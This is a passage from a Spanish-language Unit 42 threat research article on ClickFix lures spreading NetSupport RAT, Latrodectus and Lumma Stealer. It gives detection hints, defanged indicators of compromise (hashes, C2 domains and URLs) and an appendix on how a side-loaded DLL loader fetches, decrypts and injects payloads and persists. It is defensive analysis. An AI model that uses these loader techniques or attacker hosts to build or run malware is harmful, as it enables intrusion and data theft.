* **Patrones de uso de shell:** Las sesiones elevadas de PowerShell invocadas poco después de inicios de sesión interactivos, seguidas de conexiones de red o procesos secundarios sospechosos (por ejemplo, certutil.exe, mshta.exe y rundll32.exe), suelen ser señales de alarma.
* **Control del portapapeles:** Dado que los señuelos de ClickFix dependen de que las víctimas potenciales peguen contenido malicioso del portapapeles, podemos correlacionar la actividad de pegado con la ejecución de PowerShell poco después de que el usuario teclee Win+X.

## Conclusión

La técnica ClickFix es una amenaza creciente, con enfoques dinámicamente cambiantes en su aplicación. Los actores de amenazas aprovechan ClickFix en ataques contra organizaciones, explotando el error humano para su propagación y persistencia.

En este artículo se analizaban tres destacadas campañas de ClickFix (NetSupport RAT, Latrodectus y Lumma Stealer), todas ellas en constante adaptación e incorporación de nuevas técnicas.

Las metodologías prácticas para cazar y detectar señuelos ClickFix incluyen investigar la telemetría EDR o los registros de eventos de Windows en busca de eventos, actividades y patrones sospechosos.

Abordar de forma proactiva esta amenaza en evolución es vital para la seguridad permanente de las organizaciones. Con este fin, deben realizarse esfuerzos para aumentar la concienciación educando al personal para que desconfíe de los señuelos de ClickFix. Esto debe hacerse al tiempo que se establecen medidas de defensa y vigilancia basadas en nuestras sugerencias de caza.

Los clientes de Palo Alto Networks están mejor protegidos frente a las amenazas mencionadas gracias a los siguientes productos:

* [WildFire avanzado](https://www.paloaltonetworks.com/network-security/advanced-wildfire)
* [El URL Filtering avanzado](https://www.paloaltonetworks.com/network-security/advanced-url-filtering) y [la Seguridad DNS avanzada](https://www.paloaltonetworks.com/network-security/advanced-dns-security) detectan ataques ClickFix, como los comentados en este blog, con nuestros rastreadores web de seguridad offline mediante la detección de comandos maliciosos inyectados en el búfer del portapapeles por JavaScript malicioso.
* [Cortex XDR](https://docs-cortex.paloaltonetworks.com/p/XDR) y [XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM) previenen todas las campañas y programas maliciosos mencionados en este artículo mediante el módulo Protección contra amenazas de comportamiento.

Si cree que puede haber resultado vulnerado o tiene un problema urgente, póngase en contacto con el [equipo de respuesta ante incidentes de Unit 42](https://start.paloaltonetworks.com/contact-unit42.html) o llame al:

* Norteamérica: llamada gratuita: +1 (866) 486-4842 (866.4.UNIT42)
* Reino Unido: +44.20.3743.3660
* Europa y Oriente Medio: +31.20.299.3130
* Asia: +65.6983.8730
* Japón: +81.50.1790.0200
* Australia: +61.2.4062.7950
* India: 00080005045107

Palo Alto Networks ha compartido estos resultados con nuestros compañeros de Cyber Threat Alliance (CTA). Los miembros de CTA utilizan esta inteligencia para implementar rápidamente medidas de protección para sus clientes y desarticular sistemáticamente a los ciberdelincuentes. Obtenga más información sobre [Cyber Threat Alliance](https://www.cyberthreatalliance.org).

## Indicadores de vulneración

Hashes SHA256 del ejemplo de Lumma Stealer

* Nombre de archivo PartyContinued.exe: 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef
* Nombre de archivo Boat.pst (un archivo CAB): 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7

Ejemplo de robo de dominios de Lumma

* iplogger\[.\]co
* stuffgull\[.\]top
* sumeriavgv\[.\]digital
* pub-164d8d82c41c4e1b871bc21802a18154.r2\[.\]dev
* pub-626890a630d8418ea6c2ef0fa17f02ef.r2\[.\]dev
* pub-164d8d82c41c4e1b871bc21802a18154.r2\[.\]dev
* pub-a5a2932dc7f143499b865f8580102688.r2\[.\]dev
* pub-7efc089d5da740a994d1472af48fc689.r2\[.\]dev
* agroeconb\[.\]live
* animatcxju\[.\]live

Hashes SHA256 del ejemplo Latrodectus

* Nombre de archivo libcef.dll: 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1
* Descargador de PowerShell: 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293
* Descargador de JavaScript: 57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a
* Descargador de JavaScript: 33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559

Ejemplo de URL C2 de Latrodectus

* hxxps\[:\]//webbs\[.\]live/on/
* hxxps\[:\]//diab\[.\]live/up/
* hxxps\[:\]//mhbr\[.\]live/do/
* hxxps\[:\]//decr\[.\]live/j/
* hxxps\[:\]//lexip\[.\]live/n/
* hxxps\[:\]//rimz\[.\]live/u/
* hxxps\[:\]//byjs\[.\]live/v/
* hxxps\[:\]//btco\[.\]live/r/
* hxxps\[:\]//izan\[.\]live/r/
* hxxps\[:\]//k.veuwb\[.\]live/234
* hxxps\[:\]//r.netluc\[.\]live
* heyues\[.\]live
* hxxps\[:\]//k.mailam\[.\]live/234234

Ejemplo de SHA256 Hashes de NetSupport RAT

* Nombre de archivo data\_3.bin (XOR cifrado stager): 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D
* Nombre de archivo data\_4.bin (código shell cifrado XOR): 9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288
* Nombre de archivo msvcp140.dll (cargador): CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527
* Mutex del cargador de NetSupport:  
  nx0kFgSPY8SDVhOMjmNgW
* libsqlite3-0.dll: 506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a
* Ubicación del archivo C:\\ProgramData\\SecurityCheck\_v1\\client32.exe: 3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7

Ejemplo de dominios para el cargador de NetSupport RAT:

* oktacheck.it\[.\]com
* doccsign.it\[.\]com
* docusign.sa\[.\]com
* dosign.it\[.\]com
* loyalcompany\[.\]net
* leocompany\[.\]org
* 80\.77.23\[.\]48
* mhousecreative\[.\]com

Ejemplo de dominios C2 de NetSupport RAT:

* mh-sns\[.\]com
* lasix20\[.\]com

## Recursos adicionales

* [Lampion vuelve con señuelos ClickFix](https://unit42.paloaltonetworks.com/lampion-malware-clickfix-lures/): Unit 42, Palo Alto Networks
* [Nueva actividad de ClickFix](https://x.com/Unit42_Intel/status/1924866530195427372): Unit 42, Palo Alto Networks
* [De la sombra al foco: La evolución de Lumma Stealer y sus secretos ocultos](https://www.cybereason.com/blog/threat-analysis-lummastealer-2.0): CyberReason
* [Distribución de NetSupport RAT Clickfix](https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution): Esentire
* [Distribución de Lumma Stealer ClickFix](https://esentire.com/security-advisories/lumma-stealer-clickfix-distribution): Esentire
* [¡Estafa DeepSeek ClickFix al descubierto!](https://www.cloudsek.com/blog/deepseek-clickfix-scam-exposed-protect-your-data-before-its-too-late?): NubeSEK
* [ClearFake: un recién llegado al panorama de las amenazas de "actualizaciones falsas"](https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/): Sekoia
* [Havoc: SharePoint con Microsoft Graph API se convierte en FUD C2](https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2): Fortinet

## Apéndice: Análisis técnico del nuevo cargador NetSupport RAT

Esta sección se ocupa del nuevo cargador de NetSupport RAT basado en DLL, que supone un reto mayor para los analistas que las campañas anteriores. En el pasado, NetSupport RAT se cargaba mediante [cargadores de scripts](https://securelist.com/horns-n-hooves-campaign-delivering-netsupport-rat/114740/) con cadenas de infección relativamente cortas, mientras que este cargador aporta un nivel de sigilo y complejidad al ataque.

El ejemplo que analizamos aquí se llama [msvcp140.dll](https://www.virustotal.com/gui/file/cbaf513e7fd4322b14adcc34b34d793d79076ad310925981548e8d3cff886527). Este archivo DLL se carga lateralmente mediante un ejecutable legítimo llamado [jp2launcher.exe](https://www.virustotal.com/gui/file/1fc684c5adf02b5a96cc407932429f1c2d3d2e78e3104cfbcf535a9de1ee4921).

Esta DLL utiliza varias técnicas para dificultar el análisis, como las siguientes:

* Resolución dinámica de API
* Cifrado de datos
* Ofuscación del código

Por ejemplo, después de cargarse lateralmente con jp2launcher.exe, la DLL escribe el código de sus siguientes etapas byte a byte en la pila. Después, desofusca y ejecuta el código.

Después de la desofuscación inicial, la DLL recupera binarios cifrados llamados data\_3.bin y data\_4.bin del servidor C2 a través de curl.exe y deposita las cargas útiles en el disco en el mismo directorio de trabajo. En la Figura 13 se muestra la construcción del comando curl.exe para descargar una de las cargas útiles.
![Captura de pantalla de HTML con resaltado de sintaxis en la que se muestran varios comandos como mov y push.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-193704-157571-13.png) Figura 13. El cargador malicioso msvcp140.dll construye comandos curl para descargar archivos .bin mostrados en el depurador x64dbg.

El cargador guarda tanto data\_3.bin como data\_4.bin en el disco como binarios cifrados, y luego los descifra en memoria con una clave XOR rodante, que es https://google\[.\]com/. A continuación, el cargador inyecta el código descifrado en un proceso secundario de jp2launcher.exe.

El código descifrado de data\_4.bin es un shellcode relativamente pequeño que carga código descifrado de data\_3.bin. Este binario es un PE completamente formado que descarga el paquete final de NetSupport RAT como un archivo ZIP desde el servidor C2 del atacante y lo descomprime en memoria. En la Figura 14 se muestra la petición del cargador a hxxp\[:\]//80.77.23\[.\]48/service/settings/5702b2a25802ff1b520c0d1e388026f8074e836d4e69c10f9481283f886fd9f4. La solicitud contiene un agente de usuario único.
![Captura de pantalla de un registro informático que detalla las peticiones del servidor HTTP con marcas de tiempo y las respuestas del servidor.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-196847-157571-14.png) Figura 14. Solicitud de descarga de jp2launcher.exe desde C2, que descarga client32.exe.

La carga útil final es un archivo ZIP que contiene NetSupport RAT y todas sus dependencias necesarias. El cargador coloca la NetSupport RAT en C:\\ProgramData\\SecurityCheck\_v1\\ y ejecuta su binario principal, client32.exe.

A continuación, el cargador establece la persistencia de la RAT mediante la creación de una tarea programada que ejecuta client32.exe cada vez que un usuario inicia sesión.

En el proceso de análisis estático del cargador, observamos una ruta PDB única, lo que indica que esta DLL forma parte de una determinada serie de herramientas MsiShell. Al recorrer este camino, encontramos otra instancia de la campaña. En este caso utilizó un software legítimo de transferencia de archivos, filezilla.exe y cargó lateralmente otra versión del cargador, libsqlite3-0.dll. En la Figura 15 se muestra la similitud entre las rutas PDB de las dos versiones del cargador.
![Dos capturas de pantalla en las que se muestran las rutas de los archivos y los GUID de los proyectos de software, ambos son artefactos de depuración. Cada elemento se resalta en rojo.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-199602-157571-15.png) Figura 15. Rutas PDB de ambas versiones del cargador de NetSupport RAT.
Volver al principio

### Etiquetas

* [AutoIT](https://unit42.paloaltonetworks.com/es-la/tag/autoit-es-la/ "AutoIT")
* [ClickFix](https://unit42.paloaltonetworks.com/es-la/tag/clickfix-es-la/ "ClickFix")
* [Lumma Stealer](https://unit42.paloaltonetworks.com/es-la/tag/lumma-stealer-es-la/ "Lumma Stealer")
* [Malvertising](https://unit42.paloaltonetworks.com/es-la/tag/malvertising-es-la/ "malvertising")
* [Remote Access Trojan](https://unit42.paloaltonetworks.com/es-la/tag/remote-access-trojan-es-la/ "Remote Access Trojan")
* [Social engineering](https://unit42.paloaltonetworks.com/es-la/tag/social-engineering-es-la/ "social engineering")
* [Typosquatting](https://unit42.paloaltonetworks.com/es-la/tag/typosquatting-es-la/ "typosquatting")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/es-la/ "Threat Research") [Siguiente:Acordes ocultos de GoldMelody: se develaron los módulos de IIS en memoria del intermediario de acceso inicial](https://unit42.paloaltonetworks.com/es-la/initial-access-broker-exploits-leaked-machine-keys/ "Acordes ocultos de GoldMelody: se develaron los módulos de IIS en memoria del intermediario de acceso inicial")

### ÍNDICE

* 

### Artículos relacionados

* [Resumen sobre amenazas: plan de contratación que suplanta la identidad del equipo de adquisición de talentos de Palo Alto Networks](https://unit42.paloaltonetworks.com/es-la/phishing-attackers-pose-as-panw-recruiters/ "article - table of contents")
* [El diluvio de smishing: Campaña basada en China inunda los mensajes de texto a nivel global](https://unit42.paloaltonetworks.com/es-la/global-smishing-campaign/ "article - table of contents")
* [La fábrica ClickFix: primera exposición de IUAM ClickFix Generator](https://unit42.paloaltonetworks.com/es-la/clickfix-generator-first-of-its-kind/ "article - table of contents")

## Relacionados Malware Recursos

![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
[Investigación de amenazas](https://unit42.paloaltonetworks.com/es-la/category/threat-research-es-la/) 3 de Septiembre de 2026 [#### Los atacantes aprovechan el uso continuo de herramientas de IA para atacar organizaciones en América Latina](https://unit42.paloaltonetworks.com/es-la/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/es-la/tag/agentic-ai-es-la/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/es-la/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/es-la/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Leer ahora ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/es-la/ai-tool-use-targeting-latam-orgs/ "Los atacantes aprovechan el uso continuo de herramientas de IA para atacar organizaciones en América Latina")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [Amenazas sofisticadas](https://unit42.paloaltonetworks.com/es-la/category/top-cyberthreats-es-la/) 2 de Junio de 2026 [#### El panorama de amenazas de npm: superficie de ataque y mitigaciones (Actualizado el 2 de junio)](https://unit42.paloaltonetworks.com/es-la/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/es-la/tag/credential-harvesting-es-la/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/es-la/tag/github-es-la/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/es-la/tag/npm-packages/ "npm packages")  
  [Leer ahora ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/es-la/monitoring-npm-supply-chain-attacks/ "El panorama de amenazas de npm: superficie de ataque y mitigaciones (Actualizado el 2 de junio)")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [Amenazas sofisticadas](https://unit42.paloaltonetworks.com/es-la/category/top-cyberthreats-es-la/) 17 de Abril de 2026 [#### Resumen sobre amenazas: aumento del riesgo cibernético relacionado con Irán en 2026 (actualizado el 17 de abril)](https://unit42.paloaltonetworks.com/es-la/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/es-la/tag/apk/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/es-la/tag/ddos-attacks-es-la/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/es-la/tag/genai-es-la/ "GenAI")  
  [Leer ahora ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/es-la/iranian-cyberattacks-2026/ "Resumen sobre amenazas: aumento del riesgo cibernético relacionado con Irán en 2026 (actualizado el 17 de abril)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [Amenazas sofisticadas](https://unit42.paloaltonetworks.com/es-la/category/top-cyberthreats-es-la/) 1 de Abril de 2026 [#### Resumen sobre amenazas: impacto generalizado del ataque a la cadena de suministro de Axios](https://unit42.paloaltonetworks.com/es-la/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/es-la/tag/api-attacks-es-la/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/es-la/tag/javascript-es-la/ "JavaScript")

* [PowerShell](https://unit42.paloaltonetworks.com/es-la/tag/powershell-es-la/ "PowerShell")  
  [Leer ahora ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/es-la/axios-supply-chain-attack/ "Resumen sobre amenazas: impacto generalizado del ataque a la cadena de suministro de Axios")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [Amenazas sofisticadas](https://unit42.paloaltonetworks.com/es-la/category/top-cyberthreats-es-la/) 31 de Marzo de 2026 [#### Armar a los protectores: ataque multifase de TeamPCP a la cadena de suministro dirigido contra la infraestructura de seguridad](https://unit42.paloaltonetworks.com/es-la/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/es-la/tag/cve-2025-55182-es-la/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/es-la/tag/github-es-la/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/es-la/tag/infostealer-es-la/ "Infostealer")  
  [Leer ahora ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/es-la/teampcp-supply-chain-attacks/ "Armar a los protectores: ataque multifase de TeamPCP a la cadena de suministro dirigido contra la infraestructura de seguridad")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [Investigación de amenazas](https://unit42.paloaltonetworks.com/es-la/category/threat-research-es-la/) 24 de Marzo de 2026 [#### Resumen sobre amenazas: plan de contratación que suplanta la identidad del equipo de adquisición de talentos de Palo Alto Networks](https://unit42.paloaltonetworks.com/es-la/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/es-la/tag/email-scam/ "email scam")

* [Phishing](https://unit42.paloaltonetworks.com/es-la/tag/phishing-es-la/ "phishing")

* [Recruiter](https://unit42.paloaltonetworks.com/es-la/tag/recruiter/ "recruiter")  
  [Leer ahora ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/es-la/phishing-attackers-pose-as-panw-recruiters/ "Resumen sobre amenazas: plan de contratación que suplanta la identidad del equipo de adquisición de talentos de Palo Alto Networks")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [Amenazas sofisticadas](https://unit42.paloaltonetworks.com/es-la/category/top-cyberthreats-es-la/) 11 de Febrero de 2026 [#### Actores de amenazas de estados-nación explotan la cadena de suministro de Notepad++](https://unit42.paloaltonetworks.com/es-la/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/es-la/tag/backdoor/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/es-la/tag/cobalt-strike/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/es-la/tag/dll-sideloading/ "DLL Sideloading")  
  [Leer ahora ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/es-la/notepad-infrastructure-compromise/ "Actores de amenazas de estados-nación explotan la cadena de suministro de Notepad++")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [Investigación de amenazas](https://unit42.paloaltonetworks.com/es-la/category/threat-research-es-la/) 22 de Enero de 2026 [#### La próxima frontera de los ataques de ensamblado en tiempo de ejecución: aprovechamiento de los LLM para generar JavaScript de phishing en tiempo real](https://unit42.paloaltonetworks.com/es-la/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/es-la/tag/api/ "API")

* [DeepSeek](https://unit42.paloaltonetworks.com/es-la/tag/deepseek/ "DeepSeek")

* [Google](https://unit42.paloaltonetworks.com/es-la/tag/google-es-la/ "Google")  
  [Leer ahora ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/es-la/real-time-malicious-javascript-through-llms/ "La próxima frontera de los ataques de ensamblado en tiempo de ejecución: aprovechamiento de los LLM para generar JavaScript de phishing en tiempo real")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [Investigación de amenazas](https://unit42.paloaltonetworks.com/es-la/category/threat-research-es-la/) 2 de Enero de 2026 [#### VVS Discord Stealer utiliza Pyarmor para ofuscación y evasión de detección](https://unit42.paloaltonetworks.com/es-la/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/es-la/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/es-la/tag/infostealer-es-la/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/es-la/tag/python-es-la/ "Python")  
  [Leer ahora ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/es-la/vvs-stealer/ "VVS Discord Stealer utiliza Pyarmor para ofuscación y evasión de detección")  
  ![Pictorial representation of APT Ashen Lepus. The silhouette of a hare and the Lepus constellation inside an orange abstract planet. Abstract, stylized cosmic setting with vibrant blue and purple shapes, representing space and distant planetary bodies.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/12/10-01-Ashen-Lepus-1920x900-1-786x368.png)  
  [Grupos de actores de amenazas](https://unit42.paloaltonetworks.com/es-la/category/threat-actor-groups-es-la/) 11 de Diciembre de 2025 [#### Ashen Lepus, afiliado a Hamás, ataca a entidades diplomáticas de Oriente Medio con el nuevo conjunto de malware AshTag](https://unit42.paloaltonetworks.com/es-la/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/)

* [Ashen Lepus](https://unit42.paloaltonetworks.com/es-la/tag/ashen-lepus-es-la/ "Ashen Lepus")

* [Espionage](https://unit42.paloaltonetworks.com/es-la/tag/espionage-es-la/ "Espionage")

* [WIRTE](https://unit42.paloaltonetworks.com/es-la/tag/wirte-es-la/ "WIRTE")  
  [Leer ahora ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/es-la/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/ "Ashen Lepus, afiliado a Hamás, ataca a entidades diplomáticas de Oriente Medio con el nuevo conjunto de malware AshTag")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Obtener actualizaciones de Unit 42

## Manténgase un paso adelante de las amenazas para estar tranquilo. Comuníquese con nosotros hoy mismo.

Your Email

Suscribirse para recibir actualizaciones por correo electrónico de todas las investigaciones de amenazas de Unit 42.  
Cuando envía este formulario, acepta nuestras [Condiciones de uso](https://www.paloaltonetworks.com/legal-notices/terms-of-use) y confirma nuestra [Declaración de privacidad](https://www.paloaltonetworks.com/legal-notices/privacy)

Este sitio está protegido por reCAPTCHA y se aplican la [Política de privacidad](https://policies.google.com/privacy) y los [Términos de servicio](https://policies.google.com/terms) de Google.

Invalid captcha!
Suscribirse ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Productos y servicios

* [Plataforma de seguridad de la red con tecnología de IA](https://www.paloaltonetworks.lat/network-security)

* [IA segura por diseño](https://www.paloaltonetworks.lat/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.lat/prisma/prisma-ai-runtime-security)

* [Seguridad de AI Access](https://www.paloaltonetworks.lat/sase/ai-access-security)

* [Servicios de seguridad entregados en la nube](https://www.paloaltonetworks.lat/network-security/security-subscriptions)

* [Threat Prevention avanzada](https://www.paloaltonetworks.lat/network-security/advanced-threat-prevention)

* [URL Filtering avanzado](https://www.paloaltonetworks.lat/network-security/advanced-url-filtering)

* [WildFire avanzado](https://www.paloaltonetworks.lat/network-security/advanced-wildfire)

* [Seguridad de DNS avanzada](https://www.paloaltonetworks.lat/network-security/advanced-dns-security)

* [Prevención de pérdida de datos empresariales](https://www.paloaltonetworks.lat/sase/enterprise-data-loss-prevention)

* [Seguridad de IoT empresarial](https://www.paloaltonetworks.lat/content/pan/es_LA/network-security/enterprise-iot-security)

* [Seguridad de IoT para dispositivos médicos](https://www.paloaltonetworks.lat/content/pan/es_LA/network-security/medical-iot-security)

* [Seguridad de OT industrial](https://www.paloaltonetworks.lat/content/pan/es_LA/network-security/industrial-ot-security)

* [Seguridad de SaaS](https://www.paloaltonetworks.lat/sase/saas-security)

* [Firewalls de nueva generación](https://www.paloaltonetworks.lat/network-security/next-generation-firewall)

* [Firewalls de hardware](https://www.paloaltonetworks.lat/network-security/hardware-firewall-innovations)

* [Firewalls de software](https://www.paloaltonetworks.lat/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.lat/network-security/strata-cloud-manager)

* [SD-WAN para NGFW](https://www.paloaltonetworks.lat/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.lat/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.lat/network-security/panorama)

* [Perímetro de servicio de acceso seguro](https://www.paloaltonetworks.lat/sase)

* [Prisma SASE](https://www.paloaltonetworks.lat/sase)

* [Aceleración de aplicaciones](https://www.paloaltonetworks.lat/sase/app-acceleration)

* [Gestión autónoma de la experiencia digital](https://www.paloaltonetworks.lat/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.lat/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.lat/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.lat/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.lat/sase/sd-wan)

* [Aislamiento del explorador remoto](https://www.paloaltonetworks.lat/sase/remote-browser-isolation)

* [Seguridad de SaaS](https://www.paloaltonetworks.lat/sase/saas-security)

* [Plataforma de operaciones de seguridad dirigida por IA](https://www.paloaltonetworks.lat/cortex)

* [Seguridad de nube](https://www.paloaltonetworks.lat/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.lat/cortex/cloud)

* [Seguridad de las aplicaciones](https://www.paloaltonetworks.lat/cortex/cloud/application-security)

* [Postura de seguridad en la nube](https://www.paloaltonetworks.lat/cortex/cloud/cloud-posture-security)

* [Seguridad en tiempo de ejecución en la nube](https://www.paloaltonetworks.lat/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.lat/prisma/cloud)

* [SOC impulsado por IA](https://www.paloaltonetworks.lat/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.lat/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.lat/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.lat/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.lat/cortex/cortex-xpanse)

* [Detección y respuesta gestionadas de Unit 42](https://www.paloaltonetworks.lat/cortex/managed-detection-and-response)

* [XSIAM gestionado](https://www.paloaltonetworks.lat/cortex/managed-xsiam)

* [Inteligencia de amenazas y respuesta ante incidentes](https://www.paloaltonetworks.lat/unit42)

* [Evaluaciones proactivas](https://www.paloaltonetworks.lat/unit42/assess)

* [Respuesta ante incidentes](https://www.paloaltonetworks.lat/unit42/respond)

* [Transforme su estrategia de seguridad](https://www.paloaltonetworks.lat/unit42/transform)

* [Descubra la inteligencia de amenazas](https://www.paloaltonetworks.lat/unit42/threat-intelligence-partners)  
  Empresa

* [Acerca de nosotros](https://www.paloaltonetworks.com/about-us)

